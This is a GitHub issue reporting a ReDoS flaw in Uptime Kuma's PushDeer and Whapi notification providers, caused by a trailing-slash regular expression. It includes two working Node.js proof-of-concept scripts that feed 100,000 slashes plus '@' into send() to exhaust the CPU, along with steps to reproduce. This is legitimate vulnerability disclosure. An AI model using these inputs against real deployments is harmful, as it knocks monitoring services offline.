Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bug fix : correction of Regular Item Matching Rules #5574

Closed
1 task done
ShiyuBanzhou opened this issue Jan 25, 2025 · 0 comments Β· Fixed by #5573
Closed
1 task done

Bug fix : correction of Regular Item Matching Rules #5574

ShiyuBanzhou opened this issue Jan 25, 2025 · 0 comments Β· Fixed by #5573
Labels
bug Something isn't working priority:high High Priority security

Comments

@ShiyuBanzhou
Copy link
Contributor

πŸ“‘ I have found these related issues/pull requests

I have provided a solution for you to check:#5573

πŸ›‘οΈ Security Policy

Description

The regular expression \/*$\ is used to match zero or more slashes / at the end of a URL. When a malicious attack string appends a large number of slashes / and a non-slash character at the end of the URL, the regular expression enters a backtracking matching process. During this process, the regular expression engine starts checking each slash from the first one, continuing until it encounters the last non-slash character. Due to the greedy matching nature of the regular expression, this process repeats itself, with each backtrack checking the next slash until the last slash is checked. This backtracking process consumes significant CPU resources.

.replace(/\/*$/, "")

πŸ‘Ÿ Reproduction steps

Trigger conditions for pushdeer jams,In the send function within the uptime-kuma\server\notification-providers\pushdeer.js file

// The attack string "https://example" + "/".repeat(100000) + "@"
// poc.js
// Import the target file
const PushDeer = require("./server/notification-providers/pushdeer");

// Create an instance of PushDeer
const pushDeer = new PushDeer();

// Define notification parameters, including the attack string
const notification = {
    pushdeerServer: "https://e" + "/".repeat(100000) + "@",
};
// console.log(`${notification.pushdeerServer}`);
// Define the message to be sent
const msg = "Test Attacking";

// Call the send method and handle exceptions
pushDeer.send(notification, msg)
    .then(response => console.log(response))  // Output on success
    .catch(error => {
        console.error("An error occurred while sending the request:", error.message);
        console.error("Stack trace:", error.stack);
    });  // Output on error

// 1-5 are the original installation methods for the project
// 6-8 are attack methods
// ---
// 1.run `git clone https://github.com/louislam/uptime-kuma.git`
// 2.run `cd uptime-kuma`
// 3.run `npm run setup`
// 4.run `npm install pm2 -g && pm2 install pm2-logrotate`
// 5.run `pm2 start server/server.js --name uptime-kuma`
// ---
// 6.Run npm install in the root directory of the same level as `README.md`
// 7.Move `poc.js` to the root directory of the same level as `README.md`
// 8.and then run `node poc.js`

Trigger conditions for whapi jams, In the send function within the uptime-kuma\server\notification-providers\pushdeer.js file

// The attack string "httpS://example" + "/".repeat(100000) + "@"
// poc.js
// Import the target file
const Whapi = require("./uptime-kuma/server/notification-providers/whapi");

// Create an instance of Whapi
const whapi = new Whapi();

const notification = {
    whapiApiUrl: "https://e" + "/".repeat(100000) + "@",
};
// console.log(`${notification.whapiApiUrl}`);
// Define the message to be sent
const msg = "Test Attacking";

// Call the send method and handle exceptions
whapi.send(notification, msg)

// 1-5 are the original installation methods for the project
// 6-8 are attack methods
// ---
// 1.run `git clone https://github.com/louislam/uptime-kuma.git`
// 2.run `cd uptime-kuma`
// 3.run `npm run setup`
// 4.run `npm install pm2 -g && pm2 install pm2-logrotate`
// 5.run `pm2 start server/server.js --name uptime-kuma`
// ---
// 6.Run npm install in the root directory of the same level as `README.md`
// 7.Move `poc.js` to the root directory of the same level as `README.md`
// 8.and then run `node poc.js`

πŸ‘€ Expected behavior

It is expected that when facing different string parameter calls, the business logic should be executed consistently and safely, and high CPU utilization and lag will not be caused by constructing specific attack strings.

πŸ˜“ Actual Behavior

By constructing specific parameters as the input of the function call, it will cause high CPU usage and business logic jams.

Image Image Image

🐻 Uptime-Kuma Version

= 1.23.0

πŸ’» Operating System and Arch

Windows 11

🌐 Browser

Google Chrome

πŸ–₯️ Deployment Environment

  • Runtime:
  • Database:
  • Filesystem used to store the database on:
  • number of monitors:

πŸ“ Relevant log output


      		
    

      
  





        



            

              
            

        

      


      
    








      


  




  
  

              

  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment


  



  






  
                  




    

  


      
  

    Assignees
  



        

    No one assigned







      


  


  

    Labels
  



    

      

    bug

  Something isn't working
  

    priority:high

  High Priority
  

    security









      

  

    

        

    Projects
  


        




    None yet




  



      


  

    
  

    Milestone
  


      No milestone





    
      
          


  



      

    

  
      

  

    

      2 participants
    

    

        
          @CommanderStorm 
        
          @ShiyuBanzhou